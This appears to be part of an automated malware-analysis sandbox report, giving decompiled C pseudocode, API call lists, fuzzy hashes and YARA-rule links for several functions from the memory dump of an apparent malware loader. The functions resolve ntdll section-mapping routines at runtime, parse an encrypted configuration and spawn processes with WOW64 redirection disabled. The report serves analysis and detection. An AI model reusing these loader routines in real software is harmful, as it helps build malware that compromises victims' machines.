					_a28 = E00FC5741(0xfca00a, _t105 + 4);
					_t55 =  *0xfca318; // 0x38f95e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0xfca2d0; // 0x292d5a8
						_t16 = _t84 + 0xfcb8ea; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0xfca314; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0xfca2d0; // 0x292d5a8
						_t18 = _t81 + 0xfcb8c1; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0xfca290, _t107, 0x800);
						if(_t98 != _t107) {
							E00FC1A51(GetTickCount());
							_t62 =  *0xfca37c; // 0x38f9630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0xfca37c; // 0x38f9630
							__imp__(_t66 + 0x40);
							_t68 =  *0xfca37c; // 0x38f9630
							_t115 = E00FC5AE3(1, _t103, _t117,  *_t68);
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0xfc92cc);
								_push(_t115);
								_t108 = E00FC2829();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E00FC3B46(0xffffffffffffffff, _t98, _v12, _v8);
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E00FC2813();
									}
									HeapFree( *0xfca290, 0, _v24);
								}
								HeapFree( *0xfca290, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0xfca290, _t107, _t98);
						}
						HeapFree( *0xfca290, _t107, _a20);
					}
					HeapFree( *0xfca290, _t107, _t117);
				}
				return _v16;
			}

0x00fc6124
0x00fc6138
0x00fc613a
0x00fc6148
0x00fc614c
0x00fc6154
0x00fc615c
0x00fc615c
0x00fc615e
0x00fc616a
0x00fc6179
0x00fc617e
0x00fc6181
0x00fc6186
0x00fc6189
0x00fc618e
0x00fc6191
0x00fc619d
0x00fc61aa
0x00fc61ac
0x00fc61b2
0x00fc61b7
0x00fc61c2
0x00fc61c4
0x00fc61c7
0x00fc61cd
0x00fc61cf
0x00fc61d8
0x00fc61e3
0x00fc61e5
0x00fc61e8
0x00fc61e8
0x00fc61ea
0x00fc61f1
0x00fc61f6
0x00fc6203
0x00fc6205
0x00fc620a
0x00fc6218
0x00fc621a
0x00fc621f
0x00fc6224
0x00fc6227
0x00fc622c
0x00fc6237
0x00fc6239
0x00fc623c
0x00fc623c
0x00fc623e
0x00fc6251
0x00fc6255
0x00fc625a
0x00fc625e
0x00fc6261
0x00fc6266
0x00fc6271
0x00fc6273
0x00fc6276
0x00fc6276
0x00fc6278
0x00fc627f
0x00fc6282
0x00fc6287
0x00fc6291
0x00fc6293
0x00fc629a
0x00fc62b2
0x00fc62b6
0x00fc62c2
0x00fc62c7
0x00fc62d0
0x00fc62e1
0x00fc62e5
0x00fc62ee
0x00fc62f4
0x00fc6301
0x00fc630e
0x00fc6314
0x00fc631c
0x00fc6322
0x00fc6328
0x00fc632c
0x00fc6330
0x00fc6336
0x00fc633a
0x00fc6341
0x00fc6348
0x00fc634c
0x00fc6357
0x00fc635e
0x00fc6362
0x00fc636b
0x00fc636b
0x00fc637c
0x00fc637c
0x00fc638b
0x00fc6391
0x00fc6391
0x00fc639b
0x00fc639b
0x00fc63ac
0x00fc63ac
0x00fc63ba
0x00fc63ba
0x00fc63ca

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 00FC6142
GetTickCount.KERNEL32 ref: 00FC6156
wsprintfA.USER32 ref: 00FC61A5
wsprintfA.USER32 ref: 00FC61C2
wsprintfA.USER32 ref: 00FC61E3
wsprintfA.USER32 ref: 00FC6201
wsprintfA.USER32 ref: 00FC6216
wsprintfA.USER32 ref: 00FC6237
wsprintfA.USER32 ref: 00FC6271
wsprintfA.USER32 ref: 00FC6291
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00FC62AC
GetTickCount.KERNEL32 ref: 00FC62BC
RtlEnterCriticalSection.NTDLL(038F95F0), ref: 00FC62D0
RtlLeaveCriticalSection.NTDLL(038F95F0), ref: 00FC62EE

Part of subcall function 00FC5AE3: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00FC6301,00000000,038F9630), ref: 00FC5B0E
Part of subcall function 00FC5AE3: lstrlen.KERNEL32(00000000,?,00000000,00FC6301,00000000,038F9630), ref: 00FC5B16
Part of subcall function 00FC5AE3: strcpy.NTDLL ref: 00FC5B2D
Part of subcall function 00FC5AE3: lstrcat.KERNEL32(00000000,00000000), ref: 00FC5B38
Part of subcall function 00FC5AE3: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00FC6301,?,00000000,00FC6301,00000000,038F9630), ref: 00FC5B55

StrTrimA.SHLWAPI(00000000,00FC92CC,00000000,038F9630), ref: 00FC631C

Part of subcall function 00FC2829: lstrlen.KERNEL32(038F887A,00000000,00000000,00000000,00FC6328,00000000), ref: 00FC2839
Part of subcall function 00FC2829: lstrlen.KERNEL32(?), ref: 00FC2841
Part of subcall function 00FC2829: lstrcpy.KERNEL32(00000000,038F887A), ref: 00FC2855
Part of subcall function 00FC2829: lstrcat.KERNEL32(00000000,?), ref: 00FC2860

lstrcpy.KERNEL32(00000000,?), ref: 00FC633A
lstrcat.KERNEL32(00000000,00000000), ref: 00FC6348
lstrcat.KERNEL32(00000000,00000000), ref: 00FC634C
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00FC637C
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00FC638B
HeapFree.KERNEL32(00000000,00000000,00000000,038F9630), ref: 00FC639B
HeapFree.KERNEL32(00000000,?), ref: 00FC63AC
HeapFree.KERNEL32(00000000,00000000), ref: 00FC63BA

Strings

va\x, xrefs: 00FC615E

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
String ID: va\x
API String ID: 1837416118-1859480093
Opcode ID: 217f1aaf8e8000d341671c16bb439a1d18c660d911157ed5ebeea3fb1a681671
Instruction ID: 0d6c53c94058efdab55b1fe84bc14ccaa54ddd4cd21eb1231146313370746d0c
Opcode Fuzzy Hash: 217f1aaf8e8000d341671c16bb439a1d18c660d911157ed5ebeea3fb1a681671
Instruction Fuzzy Hash: 7C71AF7180821DAFC711DB68EE8BE9677ECFB88714B050519F959C3221D63AE805FB62

Uniqueness

Uniqueness Score: -1.00%

Function 00FC762C, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00FC762C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0xfca38c; // 0x38f9ca8
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E00FC5F43(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0xfc91cc;
				}
				_t46 = E00FC43FD(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E00FC5C4E(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0xfca2d0; // 0x292d5a8
						_t16 = _t75 + 0xfcbad8; // 0x530025
						 *0xfca13c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E00FC5F43(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0xfc91d0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E00FC5C4E(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E00FC2A03(_v20);
						} else {
							_t66 =  *0xfca2d0; // 0x292d5a8
							_t31 = _t66 + 0xfcbbf8; // 0x73006d
							 *0xfca13c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E00FC2A03(_v12);
				}
				return _v24;
			}

0x00fc7634
0x00fc763a
0x00fc7641
0x00fc7647
0x00fc764b
0x00fc764f
0x00fc7652
0x00fc7659
0x00fc765c
0x00fc765e
0x00fc765e
0x00fc7667
0x00fc766e
0x00fc7671
0x00fc7677
0x00fc7681
0x00fc768a
0x00fc7691
0x00fc76aa
0x00fc76b1
0x00fc76b4
0x00fc76bd
0x00fc76c6
0x00fc76d7
0x00fc76e0
0x00fc76e4
0x00fc76e8
0x00fc76ef
0x00fc76f2
0x00fc76f4
0x00fc76f4
0x00fc76fe
0x00fc7707
0x00fc770e
0x00fc7726
0x00fc772a
0x00fc7767
0x00fc772c
0x00fc772f
0x00fc7737
0x00fc7748
0x00fc7754
0x00fc775c
0x00fc7760
0x00fc7760
0x00fc772a
0x00fc776f
0x00fc7774
0x00fc777b

APIs

GetTickCount.KERNEL32 ref: 00FC7641
lstrlen.KERNEL32(?,80000002,00000005), ref: 00FC7681
lstrlen.KERNEL32(00000000), ref: 00FC768A
lstrlen.KERNEL32(00000000), ref: 00FC7691
lstrlenW.KERNEL32(80000002), ref: 00FC769E
lstrlen.KERNEL32(?,00000004), ref: 00FC76FE
lstrlen.KERNEL32(?), ref: 00FC7707
lstrlen.KERNEL32(?), ref: 00FC770E
lstrlenW.KERNEL32(?), ref: 00FC7715

Part of subcall function 00FC2A03: HeapFree.KERNEL32(00000000,00000000,00FC4072,00000000,?,?,00000000,?,?,?,?,?,?,00FC44AE,00000000), ref: 00FC2A0F

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 55403c889868d57186bcc5720c1bf12551fff45ba4530ed9bf299fbfb51cc8a3
Instruction ID: 646637b46f720fc7ace55f3c27d6b5af98038627705665a4d78c97b826bb7619
Opcode Fuzzy Hash: 55403c889868d57186bcc5720c1bf12551fff45ba4530ed9bf299fbfb51cc8a3
Instruction Fuzzy Hash: 0C412A7680021EEBCF11AFA4CE4AE9EBBB5EF44318F054094ED05A7221D7769A54FF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FC7836, Relevance: 13.6, APIs: 9, Instructions: 110
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00FC7836(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t1 = __eax + 0x14; // 0x74183966
				_t71 =  *_t1;
				_t39 = E00FC71A3(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E00FC7973( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0xfca2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0xfca2d0; // 0x292d5a8
					_t18 = _t50 + 0xfcb55b; // 0x73797325
					_t52 = E00FC1000(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0xfca2d0; // 0x292d5a8
						_t20 = _t53 + 0xfcb73d; // 0x38f8ce5
						_t21 = _t53 + 0xfcb0af; // 0x4e52454b
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xfca290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E00FC2A03(_t76);
				goto L12;
			}

0x00fc783f
0x00fc783f
0x00fc784d
0x00fc7856
0x00fc7859
0x00fc796b
0x00fc7972
0x00fc7972
0x00fc7868
0x00fc7870
0x00fc7875
0x00fc7878
0x00fc788d
0x00fc7893
0x00fc7894
0x00fc7897
0x00fc789d
0x00fc78a0
0x00fc78a5
0x00fc78ad
0x00fc78b4
0x00fc78bb
0x00fc78be
0x00fc7952
0x00fc78c4
0x00fc78c4
0x00fc78c9
0x00fc78d0
0x00fc78e4
0x00fc78e8
0x00fc7939
0x00fc78ea
0x00fc78ea
0x00fc78f1
0x00fc78f8
0x00fc7910
0x00fc7916
0x00fc791a
0x00fc7934
0x00fc791c
0x00fc7925
0x00fc792a
0x00fc792a
0x00fc791a
0x00fc794a
0x00fc794a
0x00fc78be
0x00fc7959
0x00fc7962
0x00fc7966
0x00000000

APIs

Part of subcall function 00FC71A3: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00FC7852,?,?,?,?,00000000,00000000), ref: 00FC71C8
Part of subcall function 00FC71A3: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00FC71EA
Part of subcall function 00FC71A3: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00FC7200
Part of subcall function 00FC71A3: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00FC7216
Part of subcall function 00FC71A3: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00FC722C
Part of subcall function 00FC71A3: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00FC7242

memset.NTDLL ref: 00FC78A0

Part of subcall function 00FC1000: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00FC4F1C,73797325), ref: 00FC1011
Part of subcall function 00FC1000: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00FC102B

GetModuleHandleA.KERNEL32(4E52454B,038F8CE5,73797325), ref: 00FC78D7
GetProcAddress.KERNEL32(00000000), ref: 00FC78DE
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00FC78F8
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00FC7916
CloseHandle.KERNEL32(00000000), ref: 00FC7925
CloseHandle.KERNEL32(?), ref: 00FC792A
GetLastError.KERNEL32 ref: 00FC792E
HeapFree.KERNEL32(00000000,?), ref: 00FC794A

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 91923200-0
Opcode ID: d45b4ce1a792749325af19869031f83b2295acef0c91120cb4bb772f6af79954
Instruction ID: f18fe059a4a75a2bb6091e27efa440d1fd6afd0999a85ba0ee9a51a8d22385b8
Opcode Fuzzy Hash: d45b4ce1a792749325af19869031f83b2295acef0c91120cb4bb772f6af79954
Instruction Fuzzy Hash: 93315972D0421AEBDB11ABA4DE4AEDEBFB8EF48350F104059E505A3120D775AA44EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC374B, Relevance: 9.2, APIs: 6, Instructions: 190
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00FC374B(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				void* _t46;
				void* _t47;
				signed int _t49;
				signed int _t53;
				signed int _t57;
				signed int _t61;
				signed int _t65;
				signed int _t69;
				void* _t74;
				intOrPtr _t90;

				_t75 = __ecx;
				_t20 =  *0xfca2cc; // 0x63699bc3
				if(E00FC3D6B( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x110) {
					 *0xfca320 = _v12;
				}
				_t25 =  *0xfca2cc; // 0x63699bc3
				if(E00FC3D6B( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L48;
				} else {
					_t74 = _v12;
					if(_t74 == 0) {
						_t31 = 0;
					} else {
						_t69 =  *0xfca2cc; // 0x63699bc3
						_t31 = E00FC257B(_t75, _t74, _t69 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0xfca298 = _v8;
						}
					}
					if(_t74 == 0) {
						_t32 = 0;
					} else {
						_t65 =  *0xfca2cc; // 0x63699bc3
						_t32 = E00FC257B(_t75, _t74, _t65 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0xfca29c = _v8;
						}
					}
					if(_t74 == 0) {
						_t33 = 0;
					} else {
						_t61 =  *0xfca2cc; // 0x63699bc3
						_t33 = E00FC257B(_t75, _t74, _t61 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0xfca2a0 = _v8;
						}
					}
					if(_t74 == 0) {
						_t34 = 0;
					} else {
						_t57 =  *0xfca2cc; // 0x63699bc3
						_t34 = E00FC257B(_t75, _t74, _t57 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0xfca004 = _v8;
						}
					}
					if(_t74 == 0) {
						_t35 = 0;
					} else {
						_t53 =  *0xfca2cc; // 0x63699bc3
						_t35 = E00FC257B(_t75, _t74, _t53 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							 *0xfca02c = _v8;
						}
					}
					if(_t74 == 0) {
						_t36 = 0;
					} else {
						_t49 =  *0xfca2cc; // 0x63699bc3
						_t36 = E00FC257B(_t75, _t74, _t49 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t46 = 0x10;
						_t47 = E00FC5A4E(_t46);
						if(_t47 != 0) {
							_push(_t47);
							E00FC461D();
						}
					}
					if(_t74 == 0) {
						_t37 = 0;
					} else {
						_t44 =  *0xfca2cc; // 0x63699bc3
						_t37 = E00FC257B(_t75, _t74, _t44 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E00FC5A4E(0, _t37) != 0) {
						_t90 =  *0xfca37c; // 0x38f9630
						E00FC6027(_t90 + 4, _t42);
					}
					_t38 =  *0xfca2d0; // 0x292d5a8
					_t18 = _t38 + 0xfcb2d2; // 0x38f887a
					_t19 = _t38 + 0xfcb7c4; // 0x6976612e
					 *0xfca31c = _t18;
					 *0xfca390 = _t19;
					HeapFree( *0xfca290, 0, _t74);
					L48:
					return 0;
				}
			}

0x00fc374b
0x00fc374e
0x00fc376e
0x00fc377c
0x00fc377c
0x00fc3781
0x00fc379b
0x00fc393e
0x00fc3940
0x00000000
0x00fc37a1
0x00fc37a1
0x00fc37a8
0x00fc37be
0x00fc37aa
0x00fc37aa
0x00fc37b7
0x00fc37b7
0x00fc37c8
0x00fc37ca
0x00fc37d4
0x00fc37d9
0x00fc37d9
0x00fc37d4
0x00fc37e0
0x00fc37f6
0x00fc37e2
0x00fc37e2
0x00fc37ef
0x00fc37ef
0x00fc37fa
0x00fc37fc
0x00fc3806
0x00fc380b
0x00fc380b
0x00fc3806
0x00fc3812
0x00fc3828
0x00fc3814
0x00fc3814
0x00fc3821
0x00fc3821
0x00fc382c
0x00fc382e
0x00fc3838
0x00fc383d
0x00fc383d
0x00fc3838
0x00fc3844
0x00fc385a
0x00fc3846
0x00fc3846
0x00fc3853
0x00fc3853
0x00fc385e
0x00fc3860
0x00fc386a
0x00fc386f
0x00fc386f
0x00fc386a
0x00fc3876
0x00fc388c
0x00fc3878
0x00fc3878
0x00fc3885
0x00fc3885
0x00fc3890
0x00fc3892
0x00fc389c
0x00fc38a1
0x00fc38a1
0x00fc389c
0x00fc38a8
0x00fc38be
0x00fc38aa
0x00fc38aa
0x00fc38b7
0x00fc38b7
0x00fc38c2
0x00fc38c4
0x00fc38c7
0x00fc38c8
0x00fc38cf
0x00fc38d1
0x00fc38d2
0x00fc38d2
0x00fc38cf
0x00fc38d9
0x00fc38ef
0x00fc38db
0x00fc38db
0x00fc38e8
0x00fc38e8
0x00fc38f3
0x00fc3901
0x00fc390b
0x00fc390b
0x00fc3910
0x00fc3916
0x00fc3923
0x00fc3929
0x00fc392f
0x00fc3934
0x00fc3941
0x00fc3945
0x00fc3945

APIs

StrToIntExA.SHLWAPI(00000000,00000000,00FC2F44,?,00FC2F44,63699BC3,?,00FC2F44,63699BC3,E8FA7DD7,00FCA00C,745EC740,?,?,00FC2F44), ref: 00FC37D0
StrToIntExA.SHLWAPI(00000000,00000000,00FC2F44,?,00FC2F44,63699BC3,?,00FC2F44,63699BC3,E8FA7DD7,00FCA00C,745EC740,?,?,00FC2F44), ref: 00FC3802
StrToIntExA.SHLWAPI(00000000,00000000,00FC2F44,?,00FC2F44,63699BC3,?,00FC2F44,63699BC3,E8FA7DD7,00FCA00C,745EC740,?,?,00FC2F44), ref: 00FC3834
StrToIntExA.SHLWAPI(00000000,00000000,00FC2F44,?,00FC2F44,63699BC3,?,00FC2F44,63699BC3,E8FA7DD7,00FCA00C,745EC740,?,?,00FC2F44), ref: 00FC3866
StrToIntExA.SHLWAPI(00000000,00000000,00FC2F44,?,00FC2F44,63699BC3,?,00FC2F44,63699BC3,E8FA7DD7,00FCA00C,745EC740,?,?,00FC2F44), ref: 00FC3898
HeapFree.KERNEL32(00000000,?,?,00FC2F44,63699BC3,?,00FC2F44,63699BC3,E8FA7DD7,00FCA00C,745EC740,?,?,00FC2F44), ref: 00FC3934

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 2641bf7053616ec7c46ff74f99b7c15da73615e8674fd6968ecbc3f0d42afe35
Instruction ID: 5ad15f4d92f3e79b93064fbd86f4ddfaf9a068f4b44b55834414ec82d9e72e72
Opcode Fuzzy Hash: 2641bf7053616ec7c46ff74f99b7c15da73615e8674fd6968ecbc3f0d42afe35
Instruction Fuzzy Hash: E051E6B2E0011EAADB10DBB9DF87E9F77E99B48784724891DB401D3144E635EF00BB21

Uniqueness

Uniqueness Score: -1.00%

Function 00FC2BF3, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00FC2C4F
SysAllocString.OLEAUT32(0070006F), ref: 00FC2C63
SysAllocString.OLEAUT32(00000000), ref: 00FC2C75
SysFreeString.OLEAUT32(00000000), ref: 00FC2CD9
SysFreeString.OLEAUT32(00000000), ref: 00FC2CE8
SysFreeString.OLEAUT32(00000000), ref: 00FC2CF3

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 428d6ee6c2ff010569fa192d55b8b9100f5329e3cfd50040180e39e05941677c
Instruction ID: 6b65e42c1864792da214204e6bf3412e0247b987a3d56e05d2439bf1a1ef0c1c
Opcode Fuzzy Hash: 428d6ee6c2ff010569fa192d55b8b9100f5329e3cfd50040180e39e05941677c
Instruction Fuzzy Hash: 6F318032D0060AABDB41DFB8CA4AA9FB7B6EF49310F144429ED10EB120DB759E05DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FC71A3, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC71A3(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00FC5C4E(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xfca2d0; // 0x292d5a8
					_t1 = _t23 + 0xfcb11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0xfca2d0; // 0x292d5a8
					_t2 = _t26 + 0xfcb787; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00FC2A03(_t54);
					} else {
						_t30 =  *0xfca2d0; // 0x292d5a8
						_t5 = _t30 + 0xfcb774; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xfca2d0; // 0x292d5a8
							_t7 = _t33 + 0xfcb797; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xfca2d0; // 0x292d5a8
								_t9 = _t36 + 0xfcb756; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xfca2d0; // 0x292d5a8
									_t11 = _t39 + 0xfcb7ac; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00FC225C(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00fc71b2
0x00fc71b6
0x00fc7278
0x00fc71bc
0x00fc71bc
0x00fc71c1
0x00fc71d4
0x00fc71d6
0x00fc71db
